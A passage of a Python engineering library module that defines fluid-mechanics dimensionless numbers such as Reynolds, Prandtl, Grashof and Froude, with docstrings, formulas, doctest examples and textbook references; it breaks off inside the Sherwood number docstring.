OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
from math import sqrt, sin, exp, pi, fabs, copysign
from fluids.constants import g, R
import sys
# Explicit public API of this module (used by `from fluids.core import *`).
__all__ = ['Reynolds', 'Prandtl', 'Grashof', 'Nusselt', 'Sherwood', 'Rayleigh',
'Schmidt', 'Peclet_heat', 'Peclet_mass', 'Fourier_heat', 'Fourier_mass',
'Graetz_heat', 'Lewis', 'Weber', 'Mach', 'Knudsen', 'Bond', 'Dean', 'Morton',
'Froude', 'Froude_densimetric', 'Strouhal', 'Biot', 'Stanton', 'Euler', 'Cavitation', 'Eckert',
'Jakob', 'Power_number', 'Stokes_number', 'Drag', 'Capillary', 'Bejan_L', 'Bejan_p', 'Boiling',
'Confinement', 'Archimedes', 'Ohnesorge', 'Suratman', 'Hagen', 'thermal_diffusivity', 'c_ideal_gas',
'relative_roughness', 'nu_mu_converter', 'gravity',
'K_from_f', 'K_from_L_equiv', 'L_equiv_from_K', 'L_from_K', 'dP_from_K',
'head_from_K', 'head_from_P', 'f_from_K',
'P_from_head', 'Eotvos',
'C2K', 'K2C', 'F2C', 'C2F', 'F2K', 'K2F', 'C2R', 'K2R', 'F2R', 'R2C', 'R2K', 'R2F',
'PY3',
]
# Interpreter version flags, used elsewhere in the package to select
# version-specific behavior.  sys.version_info is used instead of parsing
# sys.version by hand: the string form can carry suffixes (e.g. release
# candidates, vendor builds) that break int() parsing.
version_components = sys.version.split('.')  # kept for backward compatibility
PY_MAJOR, PY_MINOR = sys.version_info[0], sys.version_info[1]
PY3 = PY_MAJOR >= 3
### Not quite dimensionless groups
def thermal_diffusivity(k, rho, Cp):
    r'''Compute the thermal diffusivity `alpha` of a fluid.

    .. math::
        \alpha = \frac{k}{\rho Cp}

    Parameters
    ----------
    k : float
        Thermal conductivity, [W/m/K]
    rho : float
        Density, [kg/m^3]
    Cp : float
        Heat capacity, [J/kg/K]

    Returns
    -------
    alpha : float
        Thermal diffusivity, [m^2/s]

    Examples
    --------
    >>> thermal_diffusivity(k=0.02, rho=1., Cp=1000.)
    2e-05

    References
    ----------
    .. [1] Blevins, Robert D. Applied Fluid Dynamics Handbook. New York, N.Y.:
       Van Nostrand Reinhold Co., 1984.
    '''
    # Conductivity divided by the volumetric heat capacity [J/m^3/K].
    volumetric_heat_capacity = rho*Cp
    return k/volumetric_heat_capacity
### Ideal gas fluid properties
def c_ideal_gas(T, k, MW):
    r'''Calculate the speed of sound `c` in an ideal gas at temperature `T`.

    .. math::
        c = \sqrt{k R_{specific} T}, \qquad
        R_{specific} = R\frac{1000}{MW}

    Parameters
    ----------
    T : float
        Temperature of fluid, [K]
    k : float
        Isentropic exponent of fluid, [-]
    MW : float
        Molecular weight of fluid, [g/mol]

    Returns
    -------
    c : float
        Speed of sound in fluid, [m/s]

    Notes
    -----
    Used in compressible flow calculations.

    Examples
    --------
    >>> c_ideal_gas(T=303, k=1.4, MW=28.96)
    348.9820953185441

    References
    ----------
    .. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
       Eighth Edition. McGraw-Hill Professional, 2007.
    .. [2] Cengel, Yunus, and John Cimbala. Fluid Mechanics: Fundamentals and
       Applications. Boston: McGraw Hill Higher Education, 2006.
    '''
    # Convert the universal gas constant [J/mol/K] to a mass-specific one
    # [J/kg/K]; MW is in g/mol, hence the factor of 1000.
    R_specific = R*1000./MW
    return sqrt(k*R_specific*T)
### Dimensionless groups with documentation
def Reynolds(V, D, rho=None, mu=None, nu=None):
    r'''Calculates Reynolds number or `Re` for a fluid with the given
    properties for the specified velocity and diameter.

    .. math::
        Re = \frac{D \cdot V}{\nu} = \frac{\rho V D}{\mu}

    Inputs either of any of the following sets:

    * V, D, density `rho` and dynamic viscosity `mu`
    * V, D, and kinematic viscosity `nu`

    Parameters
    ----------
    V : float
        Velocity [m/s]
    D : float
        Diameter [m]
    rho : float, optional
        Density, [kg/m^3]
    mu : float, optional
        Dynamic viscosity, [Pa*s]
    nu : float, optional
        Kinematic viscosity, [m^2/s]

    Returns
    -------
    Re : float
        Reynolds number []

    Notes
    -----
    .. math::
        Re = \frac{\text{Momentum}}{\text{Viscosity}}

    An error is raised if none of the required input sets are provided.

    Examples
    --------
    >>> Reynolds(2.5, 0.25, 1.1613, 1.9E-5)
    38200.65789473684
    >>> Reynolds(2.5, 0.25, nu=1.636e-05)
    38202.93398533008

    References
    ----------
    .. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
       Eighth Edition. McGraw-Hill Professional, 2007.
    .. [2] Cengel, Yunus, and John Cimbala. Fluid Mechanics: Fundamentals and
       Applications. Boston: McGraw Hill Higher Education, 2006.
    '''
    if rho is not None and mu is not None:
        # Kinematic viscosity from dynamic viscosity and density.
        nu = mu/rho
    elif nu is None:
        # Single clean message; the old one embedded a run of indentation
        # spaces via a line continuation inside the string literal, and
        # mislabeled mu/nu.
        raise ValueError('Either density and dynamic viscosity, or '
                         'kinematic viscosity, is needed')
    return V*D/nu
def Peclet_heat(V, L, rho=None, Cp=None, k=None, alpha=None):
    r'''Calculates heat transfer Peclet number or `Pe` for a specified velocity
    `V`, characteristic length `L`, and specified properties for the given
    fluid.

    .. math::
        Pe = \frac{VL\rho C_p}{k} = \frac{LV}{\alpha}

    Inputs either of any of the following sets:

    * V, L, density `rho`, heat capacity `Cp`, and thermal conductivity `k`
    * V, L, and thermal diffusivity `alpha`

    Parameters
    ----------
    V : float
        Velocity [m/s]
    L : float
        Characteristic length [m]
    rho : float, optional
        Density, [kg/m^3]
    Cp : float, optional
        Heat capacity, [J/kg/K]
    k : float, optional
        Thermal conductivity, [W/m/K]
    alpha : float, optional
        Thermal diffusivity, [m^2/s]

    Returns
    -------
    Pe : float
        Peclet number (heat) []

    Notes
    -----
    .. math::
        Pe = \frac{\text{Bulk heat transfer}}{\text{Conduction heat transfer}}

    An error is raised if none of the required input sets are provided.

    Examples
    --------
    >>> Peclet_heat(1.5, 2, 1000., 4000., 0.6)
    20000000.0
    >>> Peclet_heat(1.5, 2, alpha=1E-7)
    30000000.0

    References
    ----------
    .. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
       Eighth Edition. McGraw-Hill Professional, 2007.
    .. [2] Cengel, Yunus, and John Cimbala. Fluid Mechanics: Fundamentals and
       Applications. Boston: McGraw Hill Higher Education, 2006.
    '''
    if rho is not None and Cp is not None and k is not None:
        alpha = k/(rho*Cp)
    elif alpha is None:
        # Single clean message; the old one embedded a run of indentation
        # spaces via a line continuation inside the string literal.
        raise ValueError('Either heat capacity and thermal conductivity and '
                         'density, or thermal diffusivity is needed')
    return V*L/alpha
def Peclet_mass(V, L, D):
    r'''Calculate the mass transfer Peclet number `Pe` for a stream moving
    at velocity `V` over characteristic length `L`, with species
    diffusivity `D`.

    .. math::
        Pe = \frac{L V}{D}
        = \frac{\text{Advective transport rate}}{\text{Diffusive transport rate}}

    Parameters
    ----------
    V : float
        Velocity [m/s]
    L : float
        Characteristic length [m]
    D : float
        Diffusivity of a species, [m^2/s]

    Returns
    -------
    Pe : float
        Peclet number (mass) []

    Examples
    --------
    >>> Peclet_mass(1.5, 2, 1E-9)
    3000000000.0

    References
    ----------
    .. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
       Eighth Edition. McGraw-Hill Professional, 2007.
    '''
    # Ratio of advection to diffusion.
    advective_rate = V*L
    return advective_rate/D
def Fourier_heat(t, L, rho=None, Cp=None, k=None, alpha=None):
    r'''Calculates heat transfer Fourier number or `Fo` for a specified time
    `t`, characteristic length `L`, and specified properties for the given
    fluid.

    .. math::
        Fo = \frac{k t}{C_p \rho L^2} = \frac{\alpha t}{L^2}

    Inputs either of any of the following sets:

    * t, L, density `rho`, heat capacity `Cp`, and thermal conductivity `k`
    * t, L, and thermal diffusivity `alpha`

    Parameters
    ----------
    t : float
        time [s]
    L : float
        Characteristic length [m]
    rho : float, optional
        Density, [kg/m^3]
    Cp : float, optional
        Heat capacity, [J/kg/K]
    k : float, optional
        Thermal conductivity, [W/m/K]
    alpha : float, optional
        Thermal diffusivity, [m^2/s]

    Returns
    -------
    Fo : float
        Fourier number (heat) []

    Notes
    -----
    .. math::
        Fo = \frac{\text{Heat conduction rate}}
        {\text{Rate of thermal energy storage in a solid}}

    An error is raised if none of the required input sets are provided.

    Examples
    --------
    >>> Fourier_heat(t=1.5, L=2, rho=1000., Cp=4000., k=0.6)
    5.625e-08
    >>> Fourier_heat(1.5, 2, alpha=1E-7)
    3.75e-08

    References
    ----------
    .. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
       Eighth Edition. McGraw-Hill Professional, 2007.
    .. [2] Cengel, Yunus, and John Cimbala. Fluid Mechanics: Fundamentals and
       Applications. Boston: McGraw Hill Higher Education, 2006.
    '''
    if rho is not None and Cp is not None and k is not None:
        alpha = k/(rho*Cp)
    elif alpha is None:
        # Single clean message; the old one embedded a run of indentation
        # spaces via a line continuation inside the string literal.
        raise ValueError('Either heat capacity and thermal conductivity and '
                         'density, or thermal diffusivity is needed')
    return t*alpha/(L*L)
def Fourier_mass(t, L, D):
    r'''Calculate the mass transfer Fourier number `Fo` for elapsed time
    `t`, characteristic length `L`, and species diffusivity `D`.

    .. math::
        Fo = \frac{D t}{L^2}
        = \frac{\text{Diffusive transport rate}}{\text{Storage rate}}

    Parameters
    ----------
    t : float
        time [s]
    L : float
        Characteristic length [m]
    D : float
        Diffusivity of a species, [m^2/s]

    Returns
    -------
    Fo : float
        Fourier number (mass) []

    Examples
    --------
    >>> Fourier_mass(t=1.5, L=2, D=1E-9)
    3.7500000000000005e-10

    References
    ----------
    .. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
       Eighth Edition. McGraw-Hill Professional, 2007.
    '''
    # Diffusive penetration scaled by the squared length.
    diffused = t*D
    return diffused/(L*L)
def Graetz_heat(V, D, x, rho=None, Cp=None, k=None, alpha=None):
    r'''Calculates Graetz number or `Gz` for a specified velocity
    `V`, diameter `D`, axial distance `x`, and specified properties for the
    given fluid.

    .. math::
        Gz = \frac{VD^2\cdot C_p \rho}{x\cdot k} = \frac{VD^2}{x \alpha}

    Inputs either of any of the following sets:

    * V, D, x, density `rho`, heat capacity `Cp`, and thermal conductivity `k`
    * V, D, x, and thermal diffusivity `alpha`

    Parameters
    ----------
    V : float
        Velocity, [m/s]
    D : float
        Diameter [m]
    x : float
        Axial distance [m]
    rho : float, optional
        Density, [kg/m^3]
    Cp : float, optional
        Heat capacity, [J/kg/K]
    k : float, optional
        Thermal conductivity, [W/m/K]
    alpha : float, optional
        Thermal diffusivity, [m^2/s]

    Returns
    -------
    Gz : float
        Graetz number []

    Notes
    -----
    .. math::
        Gz = \frac{\text{Time for radial heat diffusion in a fluid by conduction}}
        {\text{Time taken by fluid to reach distance x}}

    .. math::
        Gz = \frac{D}{x}RePr

    An error is raised if none of the required input sets are provided.

    Examples
    --------
    >>> Graetz_heat(1.5, 0.25, 5, 800., 2200., 0.6)
    55000.0
    >>> Graetz_heat(1.5, 0.25, 5, alpha=1E-7)
    187500.0

    References
    ----------
    .. [1] Bergman, Theodore L., Adrienne S. Lavine, Frank P. Incropera, and
       David P. DeWitt. Introduction to Heat Transfer. 6E. Hoboken, NJ:
       Wiley, 2011.
    '''
    if rho is not None and Cp is not None and k is not None:
        alpha = k/(rho*Cp)
    elif alpha is None:
        # Single clean message; the old one embedded a run of indentation
        # spaces via a line continuation inside the string literal.
        raise ValueError('Either heat capacity and thermal conductivity and '
                         'density, or thermal diffusivity is needed')
    return V*D*D/(x*alpha)
def Schmidt(D, mu=None, nu=None, rho=None):
    r'''Calculate the Schmidt number `Sc` of a fluid.

    .. math::
        Sc = \frac{\mu}{D\rho} = \frac{\nu}{D}
        = \frac{\text{viscous diffusivity}}{\text{species diffusivity}}

    Inputs can be any of the following sets:

    * Diffusivity, dynamic viscosity, and density
    * Diffusivity and kinematic viscosity

    Parameters
    ----------
    D : float
        Diffusivity of a species, [m^2/s]
    mu : float, optional
        Dynamic viscosity, [Pa*s]
    nu : float, optional
        Kinematic viscosity, [m^2/s]
    rho : float, optional
        Density, [kg/m^3]

    Returns
    -------
    Sc : float
        Schmidt number []

    Raises
    ------
    ValueError
        If neither (`mu`, `rho`) nor `nu` is given.

    Examples
    --------
    >>> Schmidt(D=2E-6, mu=4.61E-6, rho=800)
    0.00288125
    >>> Schmidt(D=1E-9, nu=6E-7)
    599.9999999999999

    References
    ----------
    .. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
       Eighth Edition. McGraw-Hill Professional, 2007.
    .. [2] Cengel, Yunus, and John Cimbala. Fluid Mechanics: Fundamentals and
       Applications. Boston: McGraw Hill Higher Education, 2006.
    '''
    # Guard-clause style: try the (mu, rho) form first, then nu.
    if mu is not None and rho is not None:
        return mu/(rho*D)
    if nu is not None:
        return nu/D
    raise ValueError('Insufficient information provided for Schmidt number calculation')
def Lewis(D=None, alpha=None, Cp=None, k=None, rho=None):
    r'''Return the Lewis number `Le` of a fluid.

    .. math::
        Le = \frac{k}{\rho C_p D} = \frac{\alpha}{D}

    Provide the species diffusivity together with either the thermal
    diffusivity directly, or the heat capacity, thermal conductivity, and
    density from which it is computed.

    Parameters
    ----------
    D : float
        Diffusivity of a species, [m^2/s]
    alpha : float, optional
        Thermal diffusivity, [m^2/s]
    Cp : float, optional
        Heat capacity, [J/kg/K]
    k : float, optional
        Thermal conductivity, [W/m/K]
    rho : float, optional
        Density, [kg/m^3]

    Returns
    -------
    Le : float
        Lewis number []

    Notes
    -----
    Ratio of thermal diffusivity to mass diffusivity; equivalently Sc/Pr.
    A ValueError is raised when neither complete input set is supplied.

    Examples
    --------
    >>> Lewis(D=22.6E-6, alpha=19.1E-6)
    0.8451327433628318
    >>> Lewis(D=22.6E-6, rho=800., k=.2, Cp=2200)
    0.00502815768302494

    References
    ----------
    .. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
       Eighth Edition. McGraw-Hill Professional, 2007.
    .. [2] Gesellschaft, V. D. I., ed. VDI Heat Atlas. 2nd edition.
       Berlin; New York:: Springer, 2010.
    '''
    have_transport_set = k is not None and Cp is not None and rho is not None
    if have_transport_set:
        alpha = k/(rho*Cp)
    elif alpha is None:
        raise ValueError('Insufficient information provided for Le calculation')
    return alpha/D
def Weber(V, L, rho, sigma):
    r'''Return the Weber number `We` of a fluid.

    .. math::
        We = \frac{V^2 L\rho}{\sigma}

    Parameters
    ----------
    V : float
        Velocity of fluid, [m/s]
    L : float
        Characteristic length, typically bubble diameter [m]
    rho : float
        Density of fluid, [kg/m^3]
    sigma : float
        Surface tension, [N/m]

    Returns
    -------
    We : float
        Weber number []

    Notes
    -----
    Ratio of inertial force to surface tension force; common in bubble and
    droplet calculations.

    Examples
    --------
    >>> Weber(V=0.18, L=0.001, rho=900., sigma=0.01)
    2.916

    References
    ----------
    .. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
       Eighth Edition. McGraw-Hill Professional, 2007.
    .. [2] Cengel, Yunus, and John Cimbala. Fluid Mechanics: Fundamentals and
       Applications. Boston: McGraw Hill Higher Education, 2006.
    '''
    We = V*V*L*rho/sigma
    return We
def Mach(V, c):
    r'''Return the Mach number `Ma` of a fluid moving at velocity `V` in a
    medium whose speed of sound is `c`.

    .. math::
        Ma = \frac{V}{c}

    Parameters
    ----------
    V : float
        Velocity of fluid, [m/s]
    c : float
        Speed of sound in fluid, [m/s]

    Returns
    -------
    Ma : float
        Mach number []

    Notes
    -----
    Ratio of flow velocity to sonic velocity; used in compressible-flow
    calculations.

    Examples
    --------
    >>> Mach(33., 330)
    0.1

    References
    ----------
    .. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
       Eighth Edition. McGraw-Hill Professional, 2007.
    '''
    Ma = V/c
    return Ma
def Confinement(D, rhol, rhog, sigma, g=g):
    r'''Return the Confinement number `Co` for two-phase flow in a channel.

    .. math::
        \text{Co}=\frac{\left[\frac{\sigma}{g(\rho_l-\rho_g)}\right]^{0.5}}{D}

    Parameters
    ----------
    D : float
        Diameter of channel, [m]
    rhol : float
        Density of liquid phase, [kg/m^3]
    rhog : float
        Density of gas phase, [kg/m^3]
    sigma : float
        Surface tension between liquid-gas phase, [N/m]
    g : float, optional
        Acceleration due to gravity, [m/s^2]

    Returns
    -------
    Co : float
        Confinement number [-]

    Notes
    -----
    The ratio of the capillary length to the channel diameter; used in
    two-phase pressure drop and heat transfer correlations. First used in
    [1]_ according to [2]_.

    Examples
    --------
    >>> Confinement(0.001, 1077, 76.5, 4.27E-3)
    0.6596978265315191

    References
    ----------
    .. [1] Cornwell, Keith, and Peter A. Kew. "Boiling in Small Parallel
       Channels." In Energy Efficiency in Process Technology, edited by Dr P.
       A. Pilavachi, 624-638. Springer Netherlands, 1993.
       doi:10.1007/978-94-011-1454-7_56.
    .. [2] Tran, T. N, M. -C Chyu, M. W Wambsganss, and D. M France. Two-Phase
       Pressure Drop of Refrigerants during Flow Boiling in Small Channels: An
       Experimental Investigation and Correlation Development." International
       Journal of Multiphase Flow 26, no. 11 (November 1, 2000): 1739-54.
       doi:10.1016/S0301-9322(99)00119-6.
    '''
    capillary_length = sqrt(sigma/(g*(rhol-rhog)))
    return capillary_length/D
def Morton(rhol, rhog, mul, sigma, g=g):
    r'''Return the Morton number `Mo` for a liquid-vapor pair.

    .. math::
        Mo = \frac{g \mu_l^4(\rho_l - \rho_g)}{\rho_l^2 \sigma^3}

    Parameters
    ----------
    rhol : float
        Density of liquid phase, [kg/m^3]
    rhog : float
        Density of gas phase, [kg/m^3]
    mul : float
        Viscosity of liquid phase, [Pa*s]
    sigma : float
        Surface tension between liquid-gas phase, [N/m]
    g : float, optional
        Acceleration due to gravity, [m/s^2]

    Returns
    -------
    Mo : float
        Morton number, [-]

    Notes
    -----
    Used when modeling the shape and motion of bubbles in liquids.

    Examples
    --------
    >>> Morton(1077.0, 76.5, 4.27E-3, 0.023)
    2.311183104430743e-07

    References
    ----------
    .. [1] Kunes, Josef. Dimensionless Physical Quantities in Science and
       Engineering. Elsevier, 2012.
    .. [2] Yan, Xiaokang, Kaixin Zheng, Yan Jia, Zhenyong Miao, Lijun Wang,
       Yijun Cao, and Jiongtian Liu. "Drag Coefficient Prediction of a Single
       Bubble Rising in Liquids." Industrial & Engineering Chemistry Research,
       April 2, 2018. https://doi.org/10.1021/acs.iecr.7b04743.
    '''
    mu2 = mul*mul
    numerator = g*mu2*mu2*(rhol - rhog)
    denominator = rhol*rhol*sigma*sigma*sigma
    return numerator/denominator
def Knudsen(path, L):
    r'''Return the Knudsen number `Kn` for a fluid with mean free path `path`
    and characteristic length `L`.

    .. math::
        Kn = \frac{\lambda}{L}

    Parameters
    ----------
    path : float
        Mean free path between molecular collisions, [m]
    L : float
        Characteristic length, [m]

    Returns
    -------
    Kn : float
        Knudsen number []

    Notes
    -----
    Ratio of the mean free path length to the characteristic length; used in
    rarefied gas and mass transfer calculations.

    Examples
    --------
    >>> Knudsen(1e-10, .001)
    1e-07

    References
    ----------
    .. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
       Eighth Edition. McGraw-Hill Professional, 2007.
    '''
    Kn = path/L
    return Kn
def Prandtl(Cp=None, k=None, mu=None, nu=None, rho=None, alpha=None):
    r'''Return the Prandtl number `Pr` of a fluid.

    .. math::
        Pr = \frac{C_p \mu}{k} = \frac{\nu}{\alpha} = \frac{C_p \rho \nu}{k}

    Accepts any of these input sets:

    * Heat capacity, dynamic viscosity, and thermal conductivity
    * Heat capacity, kinematic viscosity, thermal conductivity, and density
    * Thermal diffusivity and kinematic viscosity

    Parameters
    ----------
    Cp : float
        Heat capacity, [J/kg/K]
    k : float
        Thermal conductivity, [W/m/K]
    mu : float, optional
        Dynamic viscosity, [Pa*s]
    nu : float, optional
        Kinematic viscosity, [m^2/s]
    rho : float
        Density, [kg/m^3]
    alpha : float
        Thermal diffusivity, [m^2/s]

    Returns
    -------
    Pr : float
        Prandtl number []

    Notes
    -----
    Ratio of momentum diffusivity to thermal diffusivity. A ValueError is
    raised when no complete input set is supplied.

    Examples
    --------
    >>> Prandtl(Cp=1637., k=0.010, mu=4.61E-6)
    0.754657
    >>> Prandtl(Cp=1637., k=0.010, nu=6.4E-7, rho=7.1)
    0.7438528
    >>> Prandtl(nu=6.3E-7, alpha=9E-7)
    0.7000000000000001

    References
    ----------
    .. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
       Eighth Edition. McGraw-Hill Professional, 2007.
    .. [2] Gesellschaft, V. D. I., ed. VDI Heat Atlas. 2nd edition.
       Berlin; New York:: Springer, 2010.
    '''
    # Guard-clause dispatch; the input sets are checked in documented order.
    if k is not None and Cp is not None and mu is not None:
        return Cp*mu/k
    if nu is not None and rho is not None and Cp is not None and k is not None:
        return nu*rho*Cp/k
    if nu is not None and alpha is not None:
        return nu/alpha
    raise ValueError('Insufficient information provided for Pr calculation')
def Grashof(L, beta, T1, T2=0, rho=None, mu=None, nu=None, g=g):
    r'''Calculates Grashof number or `Gr` for a fluid with the given
    properties, temperature difference, and characteristic length.

    .. math::
        Gr = \frac{g\beta (T_s-T_\infty)L^3}{\nu^2}
        = \frac{g\beta (T_s-T_\infty)L^3\rho^2}{\mu^2}

    Inputs are either of the following sets:

    * L, beta, T1 and T2, and density `rho` and dynamic viscosity `mu`
    * L, beta, T1 and T2, and kinematic viscosity `nu`

    Parameters
    ----------
    L : float
        Characteristic length [m]
    beta : float
        Volumetric thermal expansion coefficient [1/K]
    T1 : float
        Temperature 1, usually a film temperature [K]
    T2 : float, optional
        Temperature 2, usually a bulk temperature (or 0 if only a difference
        is provided to the function) [K]
    rho : float, optional
        Density, [kg/m^3]
    mu : float, optional
        Dynamic viscosity, [Pa*s]
    nu : float, optional
        Kinematic viscosity, [m^2/s]
    g : float, optional
        Acceleration due to gravity, [m/s^2]

    Returns
    -------
    Gr : float
        Grashof number []

    Notes
    -----
    .. math::
        Gr = \frac{\text{Buoyancy forces}}{\text{Viscous forces}}

    An error is raised if none of the required input sets are provided.
    Used in free convection problems only. The absolute value of the
    temperature difference is used, so the order of `T1` and `T2` does not
    matter.

    Examples
    --------
    Example 4 of [1]_, p. 1-21 (matches):

    >>> Grashof(L=0.9144, beta=0.000933, T1=178.2, rho=1.1613, mu=1.9E-5)
    4656936556.178915
    >>> Grashof(L=0.9144, beta=0.000933, T1=378.2, T2=200, nu=1.636e-05)
    4657491516.530312

    References
    ----------
    .. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
       Eighth Edition. McGraw-Hill Professional, 2007.
    .. [2] Cengel, Yunus, and John Cimbala. Fluid Mechanics: Fundamentals and
       Applications. Boston: McGraw Hill Higher Education, 2006.
    '''
    if rho is not None and mu is not None:
        nu = mu/rho
    elif nu is None:
        # Message fixed: nu is the *kinematic* viscosity, and the old string
        # literal contained a backslash continuation with broken spacing.
        raise ValueError('Either density and dynamic viscosity, or kinematic '
                         'viscosity, is needed')
    return g*beta*abs(T2-T1)*L*L*L/(nu*nu)
def Bond(rhol, rhog, sigma, L, g=g):
    r'''Calculates Bond number, `Bo`, also known as Eotvos number,
    for a fluid with the given liquid and gas densities, surface tension,
    and geometric parameter (usually length).

    .. math::
        Bo = \frac{g(\rho_l-\rho_g)L^2}{\sigma}

    Parameters
    ----------
    rhol : float
        Density of liquid, [kg/m^3]
    rhog : float
        Density of gas, [kg/m^3]
    sigma : float
        Surface tension, [N/m]
    L : float
        Characteristic length, [m]
    g : float, optional
        Acceleration due to gravity, [m/s^2]

    Returns
    -------
    Bo : float
        Bond number []

    Notes
    -----
    The `g` keyword was added for consistency with the other gravity-dependent
    groups in this module (e.g. `Confinement`, `Morton`, `Grashof`); the
    default preserves the previous behavior.

    Examples
    --------
    >>> Bond(1000., 1.2, .0589, 2)
    665187.2339558573

    References
    ----------
    .. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
       Eighth Edition. McGraw-Hill Professional, 2007.
    '''
    return (g*(rhol-rhog)*L*L/sigma)

Eotvos = Bond
def Rayleigh(Pr, Gr):
    r'''Return the Rayleigh number `Ra` from the Prandtl number `Pr` and
    Grashof number `Gr`, both evaluated at the same conditions and
    characteristic length.

    .. math::
        Ra = PrGr

    Parameters
    ----------
    Pr : float
        Prandtl number []
    Gr : float
        Grashof number []

    Returns
    -------
    Ra : float
        Rayleigh number []

    Notes
    -----
    Used in free convection problems only.

    Examples
    --------
    >>> Rayleigh(1.2, 4.6E9)
    5520000000.0

    References
    ----------
    .. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
       Eighth Edition. McGraw-Hill Professional, 2007.
    '''
    Ra = Pr*Gr
    return Ra
def Froude(V, L, g=g, squared=False):
    r'''Return the Froude number `Fr` for velocity `V` and geometric length
    `L`.

    .. math::
        Fr = \frac{V}{\sqrt{gL}}

    The Froude number is also frequently defined as the square of the
    expression above; pass ``squared=True`` for that form.

    Parameters
    ----------
    V : float
        Velocity of the particle or fluid, [m/s]
    L : float
        Characteristic length, no typical definition [m]
    g : float, optional
        Acceleration due to gravity, [m/s^2]
    squared : bool, optional
        Whether to return the squared form of Froude number

    Returns
    -------
    Fr : float
        Froude number, [-]

    Notes
    -----
    Ratio of inertial force to gravity force; many alternate definitions
    including density ratios exist.

    Examples
    --------
    >>> Froude(1.83, L=2., g=1.63)
    1.0135432593877318
    >>> Froude(1.83, L=2., squared=True)
    0.17074638128208924

    References
    ----------
    .. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
       Eighth Edition. McGraw-Hill Professional, 2007.
    .. [2] Cengel, Yunus, and John Cimbala. Fluid Mechanics: Fundamentals and
       Applications. Boston: McGraw Hill Higher Education, 2006.
    '''
    ratio = V/sqrt(L*g)
    return ratio*ratio if squared else ratio
def Froude_densimetric(V, L, rho1, rho2, heavy=True, g=g):
    r'''Calculates the densimetric Froude number :math:`Fr_{den}` for velocity
    `V` geometric length `L`, heavier fluid density `rho1`, and lighter fluid
    density `rho2`. If desired, gravity can be specified as well. Depending on
    the application, this dimensionless number may be defined with the heavy
    phase or the light phase density in the numerator of the square root.
    For some applications, both need to be calculated. The default is to
    calculate with the heavy liquid density on top; set `heavy` to False
    to reverse this.

    .. math::
        Fr = \frac{V}{\sqrt{gL}} \sqrt{\frac{\rho_\text{(1 or 2)}}
        {\rho_1 - \rho_2}}

    Parameters
    ----------
    V : float
        Velocity of the specified phase, [m/s]
    L : float
        Characteristic length, no typical definition [m]
    rho1 : float
        Density of the heavier phase, [kg/m^3]
    rho2 : float
        Density of the lighter phase, [kg/m^3]
    heavy : bool, optional
        Whether or not the density used in the numerator is the heavy phase or
        the light phase, [-]
    g : float, optional
        Acceleration due to gravity, [m/s^2]

    Returns
    -------
    Fr_den : float
        Densimetric Froude number, [-]

    Notes
    -----
    Many alternate definitions including density ratios have been used.

    .. math::
        Fr = \frac{\text{Inertial Force}}{\text{Gravity Force}}

    Where the gravity force is reduced by the relative densities of one fluid
    in another.

    Note that an Exception will be raised if rho1 < rho2, as the square root
    becomes negative.

    Examples
    --------
    >>> Froude_densimetric(1.83, L=2., rho1=800, rho2=1.2, g=9.81)
    0.4134543386272418
    >>> Froude_densimetric(1.83, L=2., rho1=800, rho2=1.2, g=9.81, heavy=False)
    0.016013017679205096

    References
    ----------
    .. [1] Hall, A, G Stobie, and R Steven. "Further Evaluation of the
       Performance of Horizontally Installed Orifice Plate and Cone
       Differential Pressure Meters with Wet Gas Flows." In International
       SouthEast Asia Hydrocarbon Flow Measurement Workshop, KualaLumpur,
       Malaysia, 2008.
    '''
    # Numerator density is the heavy phase by default.
    rho3 = rho1 if heavy else rho2
    return V/(sqrt(g*L))*sqrt(rho3/(rho1 - rho2))
def Strouhal(f, L, V):
    r'''Return the Strouhal number `St` for a characteristic frequency `f`,
    characteristic length `L`, and velocity `V`.

    .. math::
        St = \frac{fL}{V}

    Parameters
    ----------
    f : float
        Characteristic frequency, usually that of vortex shedding, [Hz]
    L : float
        Characteristic length, [m]
    V : float
        Velocity of the fluid, [m/s]

    Returns
    -------
    St : float
        Strouhal number, [-]

    Notes
    -----
    Ratio of the characteristic flow time to the period of oscillation.
    Sometimes abbreviated to S or Sr.

    Examples
    --------
    >>> Strouhal(8, 2., 4.)
    4.0

    References
    ----------
    .. [1] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
       Eighth Edition. McGraw-Hill Professional, 2007.
    '''
    St = f*L/V
    return St
def Nusselt(h, L, k):
    r'''Return the Nusselt number `Nu` for a heat transfer coefficient `h`,
    characteristic length `L`, and thermal conductivity `k`.

    .. math::
        Nu = \frac{hL}{k}

    Parameters
    ----------
    h : float
        Heat transfer coefficient, [W/m^2/K]
    L : float
        Characteristic length, no typical definition [m]
    k : float
        Thermal conductivity of fluid [W/m/K]

    Returns
    -------
    Nu : float
        Nusselt number, [-]

    Notes
    -----
    Ratio of convective to conductive heat transfer. `k` is the thermal
    conductivity of the *fluid*; do not confuse it with that of a solid
    object, which appears in the Biot number instead.

    Examples
    --------
    >>> Nusselt(1000., 1.2, 300.)
    4.0
    >>> Nusselt(10000., .01, 4000.)
    0.025

    References
    ----------
    .. [1] Bergman, Theodore L., Adrienne S. Lavine, Frank P. Incropera, and
       David P. DeWitt. Introduction to Heat Transfer. 6E. Hoboken, NJ:
       Wiley, 2011.
    '''
    Nu = h*L/k
    return Nu
def Sherwood(K, L, D):
    r'''Calculates Sherwood number `Sh` for a mass transfer coefficient `K`,
    characteristic length `L`, and diffusivity `D`.

    .. math::
        Sh = \frac{KL}{D}

    Parameters
    ----------
    K : float
